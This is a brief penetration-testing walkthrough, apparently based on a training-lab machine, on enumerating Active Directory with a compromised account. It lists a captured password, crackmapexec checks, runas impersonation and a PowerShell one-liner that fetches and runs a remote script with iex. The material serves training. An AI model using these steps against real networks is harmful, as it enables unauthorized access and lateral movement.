Enumerate Active Directory(AD) remotely with any valid user account credentials.(runas and PsExec), Lateral movement

Method 1(Requires Windows machine):

Prerequisite: Credentials for at least one account which you compromised.(support:#00^BlackKnight) in this demo example.

Okay lets check whether we can get RCE via smb or via winrm using crackmapexec.

As you can see, we are not allowed to get RCE nor via smb neither via winrm.

If you are allowed to run commands remotely crackmapexec will show pwned!. Now in this case when you are exhausted enumerating LDAP,SMB,kerberos etc. but didn’t found something interesting. We can impersonate as a valid AD user using runas command in windows.

runas /netonly /user:BLACKFIELD.local\support powershell

runas /netonly /user:<FQDN>\<username> powershell

Impersonating user

Then we can run

iex (new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1');Import-ActiveDirectory
$dC=<DC IP>
Get-ADDomain -Server $dC

Then we can run sharphound remotely to query AD infomation